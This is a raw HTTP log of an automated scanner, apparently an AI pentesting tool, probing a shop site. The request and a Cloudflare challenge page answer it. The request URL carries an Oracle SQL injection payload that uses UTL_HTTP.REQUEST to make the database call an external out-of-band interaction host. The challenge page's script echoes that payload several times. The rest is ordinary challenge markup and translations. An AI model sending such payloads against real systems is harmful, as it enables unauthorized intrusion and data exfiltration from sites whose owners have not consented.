REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%20%7C%7C%20%28SELECT%20UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun%2F%27%29%20FROM%20dual%29%20%7C%7C%20%27/assets/component-localization-form.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9986
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847ab1ec1a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=uhvRGHEnYTVXkR905cB0Mq7qe%2BbAgP8SskBR36tpwW3aAQlV%2BWNFyYiVddgAWwIHA%2FTJK1wREHYoiEr8wdPsOSdNatUbxDeb5w7XFqpqw74sML%2BY45zC7sE3s8ibQnzz1izkjVACIIz67pAt1w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847ab1ec1a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'N70dgF2FClOG3D80gXMd9y9pPybbHm_T.yzl3ArkpCg-1784281171-1.2.1.1-NOVo4D6PiXzq..6i45BX0AP0g5vRLNcTS2URbcT2ENnPUOxWCZE7M1ZeX5Ou8rCb',cITimeS: '1784281171',cRay: 'a1c847ab1ec1a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_HTTP.REQUEST('http:%2F%2Fh0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun%2F')%20FROM%20dual)%20%7C%7C%20'/assets/component-localization-form.css?__cf_chl_tk=SewWxjWKa6gIV_z1dfiZkBN3HjxG_FNUsdiQgYO6wGU-1784281171-1.0.1.1-tJhMdsbhb4Izu5uwulLOJOxCrvttLorYEch0zpK8UwE",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_HTTP.REQUEST('http:%2F%2Fh0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun%2F')%20FROM%20dual)%20%7C%7C%20'/assets/component-localization-form.css?__cf_chl_f_tk=SewWxjWKa6gIV_z1dfiZkBN3HjxG_FNUsdiQgYO6wGU-1784281171-1.0.1.1-tJhMdsbhb4Izu5uwulLOJOxCrvttLorYEch0zpK8UwE",md: 'VxCzTmNtC5uDfM_8y.DKObC03_nCbDBETqh22GeC3Kg-1784281171-1.2.1.1-m5D2DKsjej_MXQNiy8eN2E0gG5KdQ0Cil4pazLJPb9qsk0GBWZn9EzdO2_98ieikuPwjaSV3ia39zTEdWAS9YMe8uRM2oUku6aqwnoRz1DPCMOlmdcDtWZgvcoDU_GMFbj6NM93AeK9X4dTJhz6QJjsKhs9Ro47Z8P0bZ.YpjHT59sW50YOtJjVUwKLCIe1Y0WKoOE3omK.9tnZt6W_93lVQ1po3555nKosZUcXS7joPnSg8fKbbItCMaFziDufCQOCmxLAz.JAfUjPkvexGXv1wy_9fOYcV9SnHyJSrBzSXQ55.Iup91jAUjNuhLTfRbrbNXsdzbW8zmD.qLfmUChg5DKQMzcg9e9RSYvZkNLucbC.WOK1BmP1ehy6kf7RLPeElT.LBdv36dOyWNqZhvWzwdGdFFDYmrz6l6U_lcHUbYb.L.7lULIeNO.7uDflzjygBGSn4h0YiGUMVUEvvOonS8T6w7tMUiGyvy2lUhX87Uh_LK.8WDdzhQ5SWA6CGY6kkj6xW4myPUyqVU3nLg5IbLAQnzejYEEYs95.4UWVikPqR82iB6HkFTZh5bQ2e8axsRhWgjeDUl1Pi.UOlDHqYflcURwFYyV0jt6a570kSNy0641gy.4CGmNd7uMCSEFyR54KlxNLe9Ov45atDdw24hkYIVMOmXd_DHSRzVUgrHEUCFHKBF7cd6sHCTMYjzbE9AeqiL4P2_0Y2yBVuaD_NJ5T3Wos3_9LwnxfUJdNjDmSvufVNd2VULsoP0OdMOiG3YeEvB_tAvDvaSAdYyKFxh.cyuBI6_zCTKHMqhvS6ptSfxVDXVtxpI9xRcfcCwUq8wk8PC5Vs4G43Qoiuj4nrYQdnnK5NxVrYRcZLl4pynuTSonWi0ZH_LYTAuVWmgZps2F80Q3i4WFiep.0g7ZKbsg2zArsqGeJwxYUuSGkqb0OZMjir9PQdiV1H3L9IWlhG_hXmVRQWMe80lGMehuLNTIF6dV.LAmQ2.rjczFubwLoGVWBIce2HRd3rD.iHUA4_L9f2n6DAUntEJ845uWU96PE4MBglfk8aT5r_njBpZVFR4dPiPC3PvpQw71eUKZhzwG.Jlz_Hut5M47vVNjXjKoDD5DjBMvb5RUzj8.Uja.NVH9.ylf4acX13AyOOifbV17owxc0RtSCmntFxOSktn3X0xfL1uUkikONtkFVAu.FMBz1pz5r4bBY4k58Zdex11ZBm48cYMs5VORJAtE9IPYBdoBoMN71OYWStoY7sFKffIrzjlxeJR4pVr0ZaLd114UyIMEtqpUhUWXjNqdAQn1ygktmyPWLq.h18YsDW9ozz4X.sHqTp.1SrImxKSu.3jPFDOaUPvEirKnHiqJqcmRxeT_utUcqunwh8nHjw5An8e.Z_BxQ4bbjMEBa8',mdrd: 'WeBDTB1_m4BXe4Ru_kbT_bvwBColcxu2Bmkzb1ueDL0-1784281171-1.2.1.1-YR2qTQ8E6Y2B5YvC30dxZN.I6QGybawUT4TyoONsbAUpGk0N8M0dPBRPh48aybaECHjMh_5zCltRp7ioLxK1HvxklXH5MBovekHitXo0LuAfLJ4KEUmcPWQv6xdTI9_rqbtXcYndl0pdL.XWaIzlO062dEZNzhRLliDpUFw94Vz1WOH7AhEWwffjyyn3ur5S8U_HOrGSD58N8rmmX9GsS_S9P7sGZxLgwT0g1JVdg.CJ0igKC8XLFeiMR7AoFWBP',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847ab1ec1a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_HTTP.REQUEST('http:%2F%2Fh0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun%2F')%20FROM%20dual)%20%7C%7C%20'/assets/component-localization-form.css?__cf_chl_rt_tk=SewWxjWKa6gIV_z1dfiZkBN3HjxG_FNUsdiQgYO6wGU-1784281171-1.0.1.1-tJhMdsbhb4Izu5uwulLOJOxCrvttLorYEch0zpK8UwE"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
